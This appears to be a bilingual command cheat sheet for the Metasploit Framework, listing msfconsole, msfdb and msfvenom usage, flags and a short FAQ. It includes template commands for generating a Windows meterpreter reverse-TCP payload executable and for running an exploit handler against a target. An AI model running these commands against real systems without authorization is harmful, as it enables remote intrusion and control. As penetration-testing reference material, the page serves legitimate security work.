Linux command
metasploit 命令
文本
复制后可按需替换文件名、目录或参数。
常用示例
Start Metasploit
msfconsole
Start without
msfconsole -q
Execute
msfconsole -r [script.rc]
Initialize
msfdb init
Run a specific module
msfconsole -x "use [exploit/multi/handler]; set RHOSTS [target]; run"
Generate a payload
msfvenom -p [windows/meterpreter/reverse_tcp] LHOST=[ip] LPORT=[port] -f [exe] -o [payload.exe]
List available payloads
msfvenom --list payloads
Search for modules
msfconsole -q -x "search [type:exploit] [platform:windows]"
说明
Metasploit Framework is a penetration testing platform for developing, testing, and executing exploits. It includes a large database of public exploits and payloads for security testing. The framework includes msfconsole (interactive shell), msfvenom (payload generator), and auxiliary tools.
参数
- -q, --quiet
- Don't print banner.
- -r _file_
- Resource script file.
- -x _cmd_
- Execute command.
- -o _file_
- Output to file.
- -L
- List all available modules, payloads, encoders, or nops.
- -n _nopsled_
- Prepend a nopsled of given size to the payload.
- -e _encoder_
- Encoder to use.
- -p _payload_
- Payload to use (msfvenom).
- -f _format_
- Output format (msfvenom): exe, elf, raw, python, c, etc.
FAQ
What is the metasploit command used for?
Metasploit Framework is a penetration testing platform for developing, testing, and executing exploits. It includes a large database of public exploits and payloads for security testing. The framework includes msfconsole (interactive shell), msfvenom (payload generator), and auxiliary tools.
How do I run a basic metasploit example?
Run `msfconsole` in a terminal, then adjust file names, paths, flags, or remote targets for your system.
What does -q, --quiet do in metasploit?
Don't print banner.